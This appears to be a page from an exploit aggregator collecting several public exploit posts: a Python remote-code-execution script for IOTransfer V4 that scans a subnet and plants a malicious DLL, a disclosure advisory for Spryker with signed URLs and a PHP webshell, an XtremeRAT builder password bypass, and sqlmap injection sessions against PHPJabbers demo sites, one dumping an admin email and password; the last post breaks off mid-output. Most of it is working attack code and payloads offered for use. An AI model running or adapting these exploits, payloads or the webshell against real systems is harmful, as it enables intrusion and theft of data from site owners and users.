Latest exploits :: CodePwn

<pre><code># Exploit Title: IOTransfer V4 – Remote Code Execution (RCE) # Date: 06/22/2022 # Exploit Author: Tomer Peled # Vendor Homepage: https://www.iobit.com # Software Link: https://iotransfer.itopvpn.com/ # Version: V4 and onward # Tested on: Windows 10 # CVE : 2022-24562 # References: https://github.com/tomerpeled92/CVE/tree/main/CVE-2022%E2%80%9324562 import os from urllib3.exceptions import ConnectTimeoutError from win32com.client import * import requests import json localPayloadPath = r"c:\temp\malicious.dll" remotePayloadPath="../Program Files (x86)/Google/Update/goopdate.dll" remoteDownloadPath = r'C:\Users\User\Desktop\obligationservlet.pdf' Range = "192.168.89" UpOrDown="Upload" IP = "" UserName = "" def get_version_number(file_path): information_parser = Dispatch("Scripting.FileSystemObject") version = information_parser.GetFileVersion(file_path) return version def getTaskList(IP, taskid=""): print("Getting task list...") url = f'http://{IP}:7193/index.php?action=gettasklist&userid=*' res = requests.get(url) tasks = json.loads(res.content) tasks = json.loads(tasks['content']) for task in tasks['tasks']: if taskid == task['taskid']: print(f"Task ID found: {taskid}") def CreateUploadTask(IP): SetSavePath(IP) url = f'http://{IP}:7193/index.php?action=createtask' task = { 'method': 'get', 'version': '1', 'userid': '*', 'taskstate': '0', } res = requests.post(url, json=task) task = json.loads(res.content) task = json.loads(task['content']) taskid = task['taskid'] print(f"[*] TaskID: {taskid}") return taskid def CreateUploadDetailNode(IP, taskid, remotePath, size='100'): url = f'http://{IP}:7193/index.php?action=settaskdetailbyindex&userid=*&taskid={taskid}&index=0' file_info = { 'size': size, 'savefilename': remotePath, 'name': remotePath, 'fullpath': r'c:\windows\system32\calc.exe', 'md5': 'md5md5md5md5md5', 'filetype': '3', } res = requests.post(url, json=file_info) js = json.loads(res.content) print(f"[V] Create Detail returned: {js['code']}") def readFile(Path): file = open(Path, "rb") byte = file.read(1) next = "Start" while next != b'': byte = byte + file.read(1023) next = file.read(1) if next != b'': byte = byte + next file.close() return byte def CallUpload(IP, taskid, localPayloadPath): url = f'http://{IP}:7193/index.php?action=newuploadfile&userid=*&taskid={taskid}&index=0' send_data = readFile(localPayloadPath) try: res = requests.post(url, data=send_data) js = json.loads(res.content) if js['code'] == 200: print("[V] Success payload uploaded!") else: print(f"CreateRemoteFile: {res.content}") except: print("[*] Reusing the task...") res = requests.post(url, data=send_data) js = json.loads(res.content) if js['code'] == 200 or "false" in js['error']: print("[V] Success payload uploaded!") else: print(f"[X] CreateRemoteFile Failed: {res.content}") def SetSavePath(IP): url = f'http://{IP}:7193/index.php?action=setiotconfig' config = { 'tasksavepath': 'C:\\Program ' } requests.post(url, json=config) def ExploitUpload(IP,payloadPath,rPath,taskid =None): if not taskid: taskid = CreateUploadTask(IP) size = os.path.getsize(payloadPath) CreateUploadDetailNode(IP, taskid, remotePath=rPath, size=str(size)) CallUpload(IP, taskid, payloadPath) def CreateDownloadTask(IP, Path) -> str: url = f'http://{IP}:7193/index.php?action=createtask' task = { 'method': 'get', 'version': '1', 'userid': '*', 'taskstate': '0', 'filepath': Path } res = requests.post(url, json=task) task = json.loads(res.content) task = json.loads(task['content']) taskid = task['taskid'] print(f"TaskID: {taskid}") return taskid def ExploitDownload(IP, DownloadPath, ID=None): if ID: url = f'http://{IP}:7193/index.php?action=downloadfile&userid=*&taskid={ID}' else: taskid = CreateDownloadTask(IP, DownloadPath) url = f'http://{IP}:7193/index.php?action=downloadfile&userid=*&taskid={taskid}' res = requests.get(url) return res def ScanIP(startRange): print("[*] Searching for vulnerable IPs", end='') Current = 142 IP = f"{startRange}.{Current}" VulnerableIP: str = "" UserName: str = "" while Current < 252: print(".", end='') url = f'http://{IP}:7193/index.php?action=getpcname&userid=*' try: res = requests.get(url, timeout=1) js = json.loads(res.content) js2 = json.loads(js['content']) UserName = js2['name'] VulnerableIP=IP print(f"\n[V] Found a Vulnerable IP: {VulnerableIP}") print(f"[!] Vulnerable PC username: {UserName}") return VulnerableIP,UserName except Exception as e: pass except ConnectTimeoutError: pass IP = f"{startRange}.{Current}" Current = Current + 1 return None,None if __name__ == '__main__': IP,UserName = ScanIP(Range) if IP is None or UserName is None: print("[X] No vulnerable IP found") exit() print("[*] Starting Exploit...") if UpOrDown == "Upload": print(f"[*]Local Payload Path: {localPayloadPath}") print(f"[*]Remote Upload Path: {remotePayloadPath}") ExploitUpload(IP,localPayloadPath,remotePayloadPath) elif UpOrDown == "Download": print(f"[*] Downloading the file: {remoteDownloadPath}") res = ExploitDownload(IP, remoteDownloadPath) file = open("out.pdf", "wb+") file.write(res.content) file.close() </code></pre>

<pre><code>Title ===== SCHUTZWERK-SA-2022-003: Remote Command Execution in Spryker Commerce OS Status ====== PUBLISHED Version ======= 1.0 CVE reference ============= CVE-2022-28888 Link ==== https://www.schutzwerk.com/en/43/advisories/schutzwerk-sa-2022-003/ Text-only version: https://www.schutzwerk.com/advisories/SCHUTZWERK-SA-2022-003.txt Affected products/vendor ======================== Spryker Commerce OS by Spryker Systems GmbH, with spryker/http module < 1.7.0 Summary ======= A predictable value is used to sign and verify special _fragment URLs in Spryker Commerce OS with spryker/http module < 1.7.0. Attackers that can guess this value are able to generate valid _fragment URLs which allow calling PHP methods, with certain restrictions. It could be demonstrated that this allows attackers to write arbitrary content to files on the file system, which, in turn, allows for execution of arbitrary PHP commands in many setups and therefore remote command execution. Risk ==== The vulnerability allows attackers to execute arbitrary commands on an operating system-level on systems where the Spryker Commerce OS is installed. In many cases, authentication is not necessary for successful exploitation. If attackers have already determined that Spryker Commerce OS is utilized through fingerprinting, checking for the presence of the vulnerability is trivial. With the ability to execute arbitrary commands, attacks can, for example, access customer data of the affected shop. Description =========== A webshop that was recently assessed for security vulnerabilities by SCHUTZWERK was found to contain a remote command execution vulnerability. The application in scope is based on a framework by Spryker -- Spryker Commerce OS. Spryker's framework, in turn, is based on Symfony[0] and/or Silex[1]. Symfony and Silex both support a special _fragment endpoint. This feature was analyzed by Ambionics Security[2] in 2020. In their write up, the feature is described as follows: One of Symfony's built-in features, made to handle ESI (Edge-Side Includes)[3], is the FragmentListener class[4]. Essentially, when someone issues a request to /_fragment, this listener sets request attributes from given GET parameters. Since this allows to run arbitrary PHP code [...], the request has to be signed using a HMAC value. [...] [...] Given its importance, [the secret used for signing] must obviously be very random. At least parts of the source code of the Spryker framework are open source and publicly accessible via GitHub. During the assessment, while certain security-sensitive parts of the source code were reviewed, it was discovered that the secret used to sign and verify _fragment URLs is static and predictable. The secret is set to md5(__DIR__) in the PHP file HttpFragmentServiceProvider.php[5] and in two different HttpConfig.php[6][7] files. __DIR__ is a built-in "magic constant" in PHP[8] and it corresponds to "the directory of the file". It is not entirely clear, which of these PHP files is actually included and loaded by the Spryker framework. However, it is assumed that the file http/src/Spryker/Shared/Http/HttpConfig.php is the culprit. Guessing the secret ^^^^^^^^^^^^^^^^^^^ In order to gain a better understanding of the vulnerability, SCHUTZWERK set up a local Spryker development instance with a demo shop[9] in order to allow for more in-depth debugging. By inspecting the source code and adding appropriate debug statements, the secret was identified as e3ae11e53f7c3d72da08784b9af763f9. This corresponds to the MD5 sum of the path /data/shop/development/current/vendor/spryker/http/src/Spryker/Shared/Http: $ echo -n '/data/shop/development/current/vendor/spryker/http/src/Spryker/'\ 'Shared/Http'| md5sum e3ae11e53f7c3d72da08784b9af763f9 - The proof-of-concept script find_secret.py[10] was developed in order to automate the process of identifying the secret based on a list of known Spryker paths. The script was executed as follows against the local development instance and correctly identified the static secret: $ python3 find_secret.py --path-list known_spryker_paths.txt \ http://www.de.b2b-demo-shop.local/_fragment [-] http://www.de.b2b-demo-shop.local/_fragment 2c03fc8fac1ff5204b56d4dbf879a3fc [-] http://www.de.b2b-demo-shop.local/_fragment f71e9665ffe0a0e3b54bbe7c2642d466 [-] http://www.de.b2b-demo-shop.local/_fragment faf0d063ad6adf3776d59bc55a17aa5f [+] http://www.de.b2b-demo-shop.local/_fragment e3ae11e53f7c3d72da08784b9af763f9 (/data/shop/development/current/vendor/spryker/http/src/Spryker/Shared/Http) This verification step does not require authentication in the default configuration. The script generates _fragment URLs based on a provided list of paths and detects whether the server views these URLs as valid (correctly signed) or not. This distinction is made based on different observations (e.g. status code, response content, etc.). The same script was then executed against the customer's instance: $ python3 find_secret.py --path-list known_spryker_paths.txt \ [CUSTOMER_DOMAIN]/_fragment [-] [CUSTOMER_DOMAIN]/_fragment e3ae11e53f7c3d72da08784b9af763f9 [-] [CUSTOMER_DOMAIN]/_fragment faf0d063ad6adf3776d59bc55a17aa5f [-] [CUSTOMER_DOMAIN]/_fragment 8399015c0dbbf2162983fb7ad0ea6a9a [-] [CUSTOMER_DOMAIN]/_fragment 8baff412797b1ddd80cd968e7446aa06 [...] [-] [CUSTOMER_DOMAIN]/_fragment 2c03fc8fac1ff5204b56d4dbf879a3fc [-] [CUSTOMER_DOMAIN]/_fragment d6de8df0b4ad55b15f198e06142dd0e6 [-] [CUSTOMER_DOMAIN]/_fragment d6de8df0b4ad55b15f198e06142dd0e6 [+] [CUSTOMER_DOMAIN]/_fragment 9c15f40d8e5610e89caf6f9b7a97be3b (/data/srv/yves/www/vendor/spryker/http/src/Spryker/Shared/Http) In this case, the identified secret 9c15f40d8e5610e89caf6f9b7a97be3b corresponds to the path /data/srv/yves/www/vendor/spryker/http/src/Spryker/Shared/Http. The installation path of the application can of course vary greatly between installations. However, if customers use the official Docker guide provided by Spryker, it is likely that they will use the paths utilized in the examples and thus share a common installation path. Even if this is not the case, customers might share installation paths between multiple environments (development, production). A compromise of one installation would therefore make a compromise of the other installations likely. Signing URLs ^^^^^^^^^^^^ In addition to the secret, a URL must be passed to the HMAC function to form the signature. However, in both instances of the vulnerability that were discovered during the assessment, the URL was the same as the external URL. This might be true for all Commerce OS installations. With a valid secret and a URL, it is now possible to sign URLs. As shown in the write up of Ambionics Security, it is generally possible to execute arbitrary commands using different methods (direct reference of a PHP class/method or deserialization of PHP objects). However, both approaches did not work, likely due to code changes made by Spryker to Symfony/Silex. Generally, the correct syntax for _fragment URLs is the following: <protocol>://<domain>/_fragment?_path=_controller=<controller specification>& _hash=<valid URL signature> Through further analysis, an alternative approach was discovered. Replacing the value of the URL parameter _path in the listing above allows to specify PHP classes with certain limitations (decoded and reformatted for increased readability): _controller[]=Path\To\Class& _controller[]=nameOfMethod& arg1=value At least the following limitations apply: * Class must have no initialize function or, alternatively, an initialize function without arguments * Class must have an constructor without arguments While examining the source code for possible candidates, the Symfony class Filesystem was discovered. This class meets the limitations and allows writing arbitrary content to a specified file path. The following payload was created (decoded and reformatted for increased readability): _controller[]=Symfony\Component\Filesystem\Filesystem& _controller[]=appendToFile& filename=SCHUTZWERK.php& content=TEST The generated URL is as follows: http://www.de.b2b-demo-shop.local/_fragment?_path=_controller%255B%255D%3DSymfony%255C Component%255CFilesystem%255CFilesystem%26_controller%255B%255D%3DappendToFile%26 filename%3D%252Ftmp%252Fschutzwerk.php%26content%3DTEST& _hash=8Phw5nGDW%2FDgLe%2Fvpep0Exzz%2BIsptnd%2FyOb4G5CT12U%3D After execution, the content is written to the file: vagrant@vm-b2b-demo-shop / $ cat /tmp/schutzwerk.php TEST With this primitive in place, it is possible to execute arbitrary PHP code and subsequently commands on an operating system level. To demonstrate this, the following PHP code for a minimal webshell was appended to the file /data/shop/development/current/public/Yves/maintenance/maintenance.php in the development instance: if(isset($_GET['pass'])){ if($_GET['pass']=="yunn@swervIfUf3"){ if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd=($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; } } } The generated URL is as follows: http://www.de.b2b-demo-shop.local/_fragment?_path=_controller%255B%255D%3DSymfony%255C Component%255CFilesystem%255CFilesystem%26_controller%255B%255D%3DappendToFile%26 filename%3D%252Fdata%252Fshop%252Fdevelopment%252Fcurrent%252Fpublic%252FYves%252F maintenance%252Fmaintenance.php%26content%3Dif%2528isset%2528%2524_GET%255B%2527pass %2527%255D%2529%2529%257B%250A%2B%2Bif%2528%2524_GET%255B%2527pass%2527%255D%253D%25 3D%2522yunn@swervIfUf3%2522%2529%257B%250A%2B%2B%2B%2Bif%2528isset%2528%2524 _REQUEST%255B%2527cmd%2527%255D%2529%2529%257B%250A%2B%2B%2B%2B%2B%2Becho%2B%2522%253Cpre %253E%2522%253B%250A%2B%2B%2B%2B%2B%2B%2524cmd%253D%2528%2524_REQUEST%255B%2527cmd%2527 %255D%2529%253B%250A%2B%2B%2B%2B%2B%2Bsystem%2528%2524cmd%2529%253B%250A%2B%2B%2B%2B%2B %2Becho%2B%2522%253C%252Fpre%253E%2522%253B%250A%2B%2B%2B%2B%2B%2Bdie%253B%250A%2B%2B%2B %2B%257D%250A%2B%2B%257D%250A%257D&_hash=XAnTzw2Y6hhbyIwO7KQ9qdTHrFMQ%2BUKWrVqRCad6JHE%3D Afterwards, the file contains the following content: <?php [...] if (file_exists(__DIR__ . '/maintenance.marker')) { http_response_code(503); echo file_get_contents(__DIR__ . '/index.html'); exit(0); } if(isset($_GET['pass'])){ if($_GET['pass']=="yunn@swervIfUf3"){ if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd=($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; } } } Since the PHP file maintenance.php is consulted for every request, the injected PHP webshell code can be executed using URLs similar to the following: http://www.de.b2b-demo-shop.local/?pass=yunn@swervIfUf3&cmd=id Solution/Mitigation =================== 1. Update spryker/http module to version 1.7.0 2. Configure SPRYKER_ZED_REQUEST_TOKEN environment variable with a long, random and secure string Disclosure timeline =================== 2022-04-07: Vulnerability discovered 2022-04-07: Initial contact with vendor 2022-04-08: Vulnerability reported to vendor 2022-04-08: CVE-2022-28888 assigned by MITRE 2022-04-11: Vendor notifies customers about vulnerability, releases patch 2022-04-26: Requested update from vendor 2022-05-05: Requested update from vendor 2022-06-20: Notified vendor of intention to publish advisory on 20220-06-30 2022-06-22: Vendor confirms that customers were notified about the vulnerability 2022-07-12: Advisory published by SCHUTZWERK Contact/Credits =============== The vulnerability was discovered during an assessment by David Brown and Marcelo Reyes of SCHUTZWERK GmbH. References ========== [0] https://symfony.com [1] https://github.com/silexphp/Silex [2] https://www.ambionics.io/blog/symfony-secret-fragment [3] https://en.wikipedia.org/wiki/Edge_Side_Includes [4] https://github.com/symfony/symfony/blob/ac236517cc8925110d2ec9c35cfdb682a7b82f06/src/Symfony/Component/HttpKernel/EventListener/FragmentListener.php [5] https://github.com/spryker/silexphp/blob/94d2afc9b1ed9662193985cad1ba47da33bdc80d/src/Silex/Provider/HttpFragmentServiceProvider.php#L75 [6] https://github.com/spryker/http/blob/56313eaff6594821849846d1b93e0b7eba9a09b6/src/Spryker/Shared/Http/HttpConfig.php#L29 [7] https://github.com/spryker/spryker-core/blob/88ab823143b5521b4e1bb1b930321ec39eb4ec1e/Bundles/Http/src/Spryker/Shared/Http/HttpConfig.php#L29 [8] https://www.php.net/manual/en/language.constants.magic.php [9] https://docs.spryker.com/docs/scos/dev/setup/installing-spryker-with-development-virtual-machine/installing-spryker-with-devvm-on-macos-and-linux.html [10] https://www.schutzwerk.com/en/43/assets/advisories/find_secret.py Disclaimer ========== The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The most recent version of this security advisory can be found at SCHUTZWERK GmbH's website ( https://www.schutzwerk.com ). -- SCHUTZWERK GmbH, Pfarrer-Weiß-Weg 12, 89077 Ulm, Germany Phone +49 731 977 191 0 Fax +49 731 977 191 99 Mobile +49 171 337 2701 advisories@schutzwerk.com / www.schutzwerk.com Geschäftsführer / Managing Directors: Jakob Pietzka, Michael Schäfer Amtsgericht Ulm / HRB 727391 </code></pre>

<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022 Original source: https://malvuln.com/advisory/7f314e798c150aedd9ce41ed39318f65_B.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: Builder XtremeRAT v3.7 Vulnerability: Insecure Crypto Bypass Description: The malware builds backdoors and requires authentication to access the GUI using credentials stored in the "user.info" config file. XtremeRAT doesn't properly validate saved passwords are what the user actually set when saving them in user.info config. This can allow attackers who can guess the first few characters the ability to pad the rest with zeroes or whatever character they want, providing they guess the password length. The issue it seems is in Delphi 2009, default string type changed from ANSI, the MD5 implementation is not unicode aware generating incorrect hashes. Therefore, a user may enter the password "abc123" thinking that is the exact password which will grant access to the builder. However, the flaw allows attackers the ability to more easily bypass authentication as only part of the password will now be required as the remainder can be any characters E.g. abc000. Moreover, the hashing implementation used makes no use of a salt. Creating a similar password hash to logon, requires the resulting file size should be be 64 bytes not 32. If you just copy and paste a hash into a file you may see it is only 32 bytes, the one generated by XtremeRAT is 64 bytes as it is encoded. Family: Xtreme Type: PE32 MD5: 7f314e798c150aedd9ce41ed39318f65 Vuln ID: MVID-2022-0624 Disclosure: 07/15/2022 Exploit/PoC: import os, hashlib #Creates broken unicode MD5 hashes to change an existing XtremeRAT config password. #By malvuln # #================================================================================= #Basically, if the actual password is 'abc123' and was generated by XtremeRAT #we only need to guess 3 out of 6 chars E.g. abc000 #as long as we can guess the length we can bypass the need to know the full password. #We can also emulate broken passwords and replace "user.info" config with ours. passwd = u'abc' tmp = hashlib.md5(passwd.encode('utf-16le')) print("[+] XtremeRAT v3.7 ") print("[+] Password hash bypass created") print("[+] By malvuln") print("[-] " +tmp.hexdigest()) print("Login using abc000 or any last three chars!") #outputs: ce1473cf80c6b3fda8e3dfc006adc315 #HEX: 610062006300 #Login using abc000, abc!@# or abc123 it don't matter. XRat_Config="C:\\XtremeRAT_v3.7\\user.info" if os.path.exists(XRat_Config): os.remove(XRat_Config) f=open(XRat_Config, "w", encoding='utf-16LE') f.write(_hash2) f.close() Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). </code></pre>

<pre><code>┌┌────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Exploits ] ┌┘ └────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr │ │ : │ Website : phpjabbers.com │ │ │ │ Vendor : PHPJABBERS │ │ Property Listing Script │ │ Software : Property Listing Script 3.1 │ │ │ │ Vuln Type: Remote SQL Injection │ │ Script will give you │ │ Method : GET │ │ the tools to efficiently manage │ │ Critical : High [░░▒▒▓▓██] │ │ your own real estate portal │ │ Impact : Database Access │ │ │ │ │ │ │ │ ────────────────────────────────────────┘ └─────────────────────────────────────────│ │ B4nks-NET irc.b4nks.tk #unix ┌┘ └────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ Typically used for remotely exploitable vulnerabilities that can lead to │ │ system compromise. │ │ │ ┌┌────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: Phr33k , NK, GoldenX, Wehla, Cap, ZARAGAGA, DarkCatSpace, R0ot, KnG, Centerk loool, DevS, Dark-Gost CryptoJob (Twitter) twitter.com/CryptozJob ┌┌────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2022 ┌┘ └────────────────────────────────────────────────────────────────────────────────────┘┘ Live Demo Site: https://www.phpjabbers.com/property-listing-script/#sectionDemo [INFO] GET parameter 'min_bedrooms' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable GET parameter 'min_bedrooms' is vulnerable. sqlmap identified the following injection point(s) with a total of 414 HTTP(s) requests: --- Parameter: min_bedrooms (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1) AND 7719=7719 AND (2759=2759 Type: error-based Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) Payload: controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1) AND GTID_SUBSET(CONCAT(0x716b627171,(SELECT (ELT(3030=3030,1))),0x71626a7871),3030) AND (5977=5977 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1) AND (SELECT 2245 FROM (SELECT(SLEEP(5)))iJfC) AND (1861=1861 --- sqlmap.py -u "https://demo.phpjabbers.com/1657921261_148/preview.php?controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1" --current-db --batch --random-agent --threads 5 [INFO] the back-end DBMS is MySQL web server operating system: Linux CentOS 6 web application technology: Apache 2.2.15 back-end DBMS: MySQL >= 5.6 [01:13:36] [INFO] fetching current database [01:13:36] [INFO] retrieved: 'pjabbers_demo_pls' current database: 'pjabbers_demo_pls' sqlmap.py -u "https://demo.phpjabbers.com/1657921261_148/preview.php?controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1" -D pjabbers_demo_pls --tables --batch --random-agent --- Parameter: min_bedrooms (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1) AND 7719=7719 AND (2759=2759 Type: error-based Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) Payload: controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1) AND GTID_SUBSET(CONCAT(0x716b627171,(SELECT (ELT(3030=3030,1))),0x71626a7871),3030) AND (5977=5977 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1) AND (SELECT 2245 FROM (SELECT(SLEEP(5)))iJfC) AND (1861=1861 --- [INFO] the back-end DBMS is MySQL web server operating system: Linux CentOS 6 web application technology: Apache 2.2.15 back-end DBMS: MySQL >= 5.6 Database: pjabbers_demo_pls [66 tables] +----------------------------------------------------------------+ | 1657528735_303_pls_30_property_listing_features | | 1657528735_303_pls_30_property_listing_fields | | 1657528735_303_pls_30_property_listing_multi_lang | | 1657528735_303_pls_30_property_listing_options | | 1657528735_303_pls_30_property_listing_passwords | | 1657528735_303_pls_30_property_listing_payments | | 1657528735_303_pls_30_property_listing_periods | | 1657528735_303_pls_30_property_listing_plugin_country | | 1657528735_303_pls_30_property_listing_plugin_galleries_set | | 1657528735_303_pls_30_property_listing_plugin_gallery | | 1657528735_303_pls_30_property_listing_plugin_locale_languages | | 1657528735_303_pls_30_property_listing_plugin_locale | | 1657528735_303_pls_30_property_listing_plugin_log_config | | 1657528735_303_pls_30_property_listing_plugin_log | | 1657528735_303_pls_30_property_listing_plugin_one_admin | | 1657528735_303_pls_30_property_listing_plugin_paypal | | 1657528735_303_pls_30_property_listing_plugin_sms | | 1657528735_303_pls_30_property_listing_properties_features | | 1657528735_303_pls_30_property_listing_properties | | 1657528735_303_pls_30_property_listing_roles | | 1657528735_303_pls_30_property_listing_types | | 1657528735_303_pls_30_property_listing_users | | 1657921261_148_pls_30_property_listing_features | | 1657921261_148_pls_30_property_listing_fields | | 1657921261_148_pls_30_property_listing_multi_lang | | 1657921261_148_pls_30_property_listing_options | | 1657921261_148_pls_30_property_listing_passwords | | 1657921261_148_pls_30_property_listing_payments | | 1657921261_148_pls_30_property_listing_periods | | 1657921261_148_pls_30_property_listing_plugin_country | | 1657921261_148_pls_30_property_listing_plugin_galleries_set | | 1657921261_148_pls_30_property_listing_plugin_gallery | | 1657921261_148_pls_30_property_listing_plugin_locale_languages | | 1657921261_148_pls_30_property_listing_plugin_locale | | 1657921261_148_pls_30_property_listing_plugin_log_config | | 1657921261_148_pls_30_property_listing_plugin_log | | 1657921261_148_pls_30_property_listing_plugin_one_admin | | 1657921261_148_pls_30_property_listing_plugin_paypal | | 1657921261_148_pls_30_property_listing_plugin_sms | | 1657921261_148_pls_30_property_listing_properties_features | | 1657921261_148_pls_30_property_listing_properties | | 1657921261_148_pls_30_property_listing_roles | | 1657921261_148_pls_30_property_listing_types | | 1657921261_148_pls_30_property_listing_users | | pls_30_property_listing_features | | pls_30_property_listing_fields | | pls_30_property_listing_multi_lang | | pls_30_property_listing_options | | pls_30_property_listing_passwords | | pls_30_property_listing_payments | | pls_30_property_listing_periods | | pls_30_property_listing_plugin_country | | pls_30_property_listing_plugin_galleries_set | | pls_30_property_listing_plugin_gallery | | pls_30_property_listing_plugin_locale | | pls_30_property_listing_plugin_locale_languages | | pls_30_property_listing_plugin_log | | pls_30_property_listing_plugin_log_config | | pls_30_property_listing_plugin_one_admin | | pls_30_property_listing_plugin_paypal | | pls_30_property_listing_plugin_sms | | pls_30_property_listing_properties | | pls_30_property_listing_properties_features | | pls_30_property_listing_roles | | pls_30_property_listing_types | | pls_30_property_listing_users | +----------------------------------------------------------------+ sqlmap.py -u "https://demo.phpjabbers.com/1657921261_148/preview.php?controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1" -D pjabbers_demo_pls -T pls_30_property_listing_users --columns --batch --random-agent fetching columns for table 'pls_30_property_listing_users' in database 'pjabbers_demo_pls' Database: pjabbers_demo_pls Table: pls_30_property_listing_users [12 columns] +------------+------------------+ | Column | Type | +------------+------------------+ | created | datetime | | email | varchar(255) | | fax | varchar(255) | | id | int(10) unsigned | | ip | varchar(15) | | is_active | enum('T','F') | | last_login | datetime | | name | varchar(255) | | password | blob | | phone | varchar(255) | | role_id | int(10) unsigned | | status | enum('T','F') | +------------+------------------+ sqlmap.py -u "https://demo.phpjabbers.com/1657921261_148/preview.php?controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1" -D pjabbers_demo_pls -T pls_30_property_listing_users -C email,password --dump --batch --random-agent fetching entries of column(s) 'email,password' for table 'pls_30_property_listing_users' in database 'pjabbers_demo_pls' Database: pjabbers_demo_pls Table: pls_30_property_listing_users [1 entry] +-----------------+----------+ | email | password | +-----------------+----------+ | admin@admin.com | P@S13rd | +-----------------+----------+ [-] Done </code></pre>

<pre><code>┌┌────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Exploits ] ┌┘ └────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr │ │ : │ Website : phpjabbers.com │ │ │ │ Vendor : PHPJABBERS │ │ Travel Tours Script │ │ Software : Travel Tours Script V1.0 │ │ │ │ Vuln Type: Remote SQL Injection │ │ A content management solution for │ │ Method : GET │ │ travel agencies and tour operators │ │ Critical : High [░░▒▒▓▓██] │ │ │ │ Impact : Database Access │ │ │ │ ─────────────────────────────────────┘ └────────────────────────────────────│ │ B4nks-NET irc.b4nks.tk #unix ┌┘ └────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ Typically used for remotely exploitable vulnerabilities that can lead to │ │ system compromise. │ │ │ ┌┌────────────────────────────────────────────────────────────────────────────┐ ┌┘ Exploit URL's ┌┘ └────────────────────────────────────────────────────────────────────────────┘┘ Live Demo Site: https://www.phpjabbers.com/travel-tours-script/#sectionDemo POC: https://demo.phpjabbers.com/1657840896_841/front.php?controller=pjListings&action=pjActionListings&listing_search=1&view=list&item_per_page=10&type=1'[Injection] GET parameter 'type' is vulnerable --- Parameter: type (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: controller=pjListings&action=pjActionListings&listing_search=1&view=list&item_per_page=10&type=1) AND 8667=8667 AND (4844=4844 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: controller=pjListings&action=pjActionListings&listing_search=1&view=list&item_per_page=10&type=1) AND (SELECT 7164 FROM (SELECT(SLEEP(5)))loCg) AND (7206=7206 --- [+] Starting the Attack sqlmap.py -u "https://demo.phpjabbers.com/1657840896_841/front.php?controller=pjListings&action=pjActionListings&listing_search=1&view=list&item_per_page=10&type=1" --current-db --batch --random-agent --no-cast the back-end DBMS is MySQL web server operating system: Linux CentOS 6 web application technology: Apache 2.2.15 back-end DBMS: MySQL >= 5.0.12 [INFO] fetching current database current database: 'pjabbers_demo_vpl' sqlmap.py -u "https://demo.phpjabbers.com/1657840896_841/front.php?controller=pjListings&action=pjActionListings&listing_search=1&view=list&item_per_page=10&type=1" -D pjabbers_demo_vpl --tables --batch --random-agent --no-cast [INFO] fetching tables for database: 'pjabbers_demo_vpl' [INFO] fetching number of tables for database 'pjabbers_demo_vpl' [INFO] resumed: 52 +------------------------------------------+ | vacationpackages_comments | | vacationpackages_countries | | vacationpackages_enquiries | | vacationpackages_features | | vacationpackages_fields | | vacationpackages_listings_availabilities | | vacationpackages_listings_features | | vacationpackages_listings | | vacationpackages_multi_lang | | vacationpackages_notifications | | vacationpackages_options | | vacationpackages_payments | | vacationpackages_periods | | vacationpackages_plugin_country | | vacationpackages_plugin_galleries_set | | vacationpackages_plugin_gallery | | vacationpackages_plugin_locale_languages | | 